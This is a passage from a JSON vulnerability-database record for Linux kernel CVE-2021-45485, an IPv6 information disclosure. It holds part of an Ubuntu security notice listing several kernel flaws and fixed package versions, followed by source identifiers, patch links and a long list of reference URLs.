overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nNorbert Slusarek discovered that the CAN broadcast manger (bcm) protocol\nimplementation in the Linux kernel did not properly initialize memory in\nsome situations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2021-34693)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in\nthe Linux kernel did not properly perform reference counting in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-3483)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device initialization failure, leading to a double-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3564)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. (CVE-2021-3612)\n\nIt was discovered that the tracing subsystem in the Linux kernel did not\nproperly keep track of per-cpu ring buffer state. A privileged attacker\ncould use this to cause a denial of service. (CVE-2021-3679)\n\nIt was discovered that the MAX-3421 host USB device driver in the Linux\nkernel did not properly handle device removal events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2021-38204)\n\nIt was discovered that the 6pack network protocol driver in the Linux\nkernel did not properly perform validation checks. A privileged attacker\ncould use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2021-42008)\n\nAmit Klein discovered that the IPv6 implementation in the Linux kernel\ncould disclose internal state in some situations. An attacker could\npossibly use this to expose sensitive information. (CVE-2021-45485)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n linux-image-4.4.0-1100-kvm 4.4.0-1100.109\n linux-image-4.4.0-1135-aws 4.4.0-1135.149\n linux-image-4.4.0-219-generic 4.4.0-219.252\n linux-image-4.4.0-219-lowlatency 4.4.0-219.252\n linux-image-aws 4.4.0.1135.140\n linux-image-generic 4.4.0.219.226\n linux-image-kvm 4.4.0.1100.98\n linux-image-lowlatency 4.4.0.219.226\n linux-image-virtual 4.4.0.219.226\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1099-aws 4.4.0-1099.104\n linux-image-4.4.0-219-generic 4.4.0-219.252~14.04.1\n linux-image-4.4.0-219-lowlatency 4.4.0-219.252~14.04.1\n linux-image-aws 4.4.0.1099.97\n linux-image-generic-lts-xenial 4.4.0.219.190\n linux-image-lowlatency-lts-xenial 4.4.0.219.190\n linux-image-virtual-lts-xenial 4.4.0.219.190\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-5299-1\n CVE-2020-26147, CVE-2020-26558, CVE-2021-0129, CVE-2021-28972,\n CVE-2021-33034, CVE-2021-34693, CVE-2021-3483, CVE-2021-3564,\n CVE-2021-3612, CVE-2021-3679, CVE-2021-38204, CVE-2021-42008,\n CVE-2021-45485\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-45485"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
},
{
"db": "PACKETSTORM",
"id": "166101"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-45485",
"trust": 4.1
},
{
"db": "PACKETSTORM",
"id": "169695",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169997",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169941",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169719",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166101",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169411",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0205",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5536",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1225",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6062",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0215",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.0061",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0380",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6111",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2855",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0615",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3236",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3136",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0121",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5590",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070643",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062931",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-409116",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-45485",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167602",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167622",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167072",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167330",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
},
{
"db": "PACKETSTORM",
"id": "166101"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"id": "VAR-202112-2255",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:48:31.703000Z",
"patch": {
"_id": null,
"data": [
{
"title": "NTAP-20220121-0001",
"trust": 0.8,
"url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.3"
},
{
"title": "Linux kernel Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=177039"
},
{
"title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226983 - Security Advisory"
},
{
"title": "Red Hat: Important: kernel-rt security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226991 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.9.7 Images security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228609 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.8.53 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227874 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.10.39 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227211 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.9.51 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227216 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: USN-5299-1: Linux kernel vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5299-1"
},
{
"title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221988 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.6.5 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224814 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.2 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225483 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.5 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225201 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Advanced Cluster Management 2.5 security updates, images, and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224956 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.11 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225392 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: USN-5343-1: Linux kernel vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5343-1"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/SYRTI/POC_to_review "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/trhacknon/Pocingit "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-327",
"trust": 1.1
},
{
"problemtype": "Use of incomplete or dangerous cryptographic algorithms (CWE-327) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://arxiv.org/pdf/2112.09604.pdf"
},
{
"trust": 2.6,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220121-0001/"
},
{
"trust": 1.8,
"url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.3"
},
{
"trust": 1.8,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=62f20e068ccc50d6ab66fdb72ba90da2b9418c99"
},
{
"trust": 1.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45485"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-45485"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-45486"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1225"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2855"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169411/red-hat-security-advisory-2022-6991-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169719/red-hat-security-advisory-2022-7216-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0061"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0121"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0380"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169997/red-hat-security-advisory-2022-8609-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169695/red-hat-security-advisory-2022-7211-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062931"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5590"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169941/red-hat-security-advisory-2022-7874-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6062"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-information-disclosure-via-ipv6-id-generation-37138"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6111"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166101/ubuntu-security-notice-usn-5299-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0615"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3136"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070643"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0205"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3236"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0215"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5536"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3752"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4157"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3744"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-13974"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3773"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4002"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-43976"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-0941"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-43389"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-44733"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4037"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-29154"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-37159"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3772"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-0404"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3669"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3764"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20322"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-41864"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4197"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3612"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-26401"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-27820"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3743"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1011"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4083"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0322"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0286"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0001"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3759"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0002"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4203"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-42739"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-43056"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-4788"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-21781"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5299-1"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3696"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-38185"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21803"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28736"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3697"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28734"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28737"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-25219"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3695"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28735"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-29810"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3772"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3759"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3773"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3743"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3764"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37159"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4002"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3744"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45486"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21166"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21166"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21125"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21125"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2588"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21123"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2588"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/327.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6983"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25645"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5392"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42739"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1975"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4203"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4197"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4157"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.6_release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41864"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1154"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7211"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39399"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:7210"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40674"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1996"
},
{
"trust": 0.1,
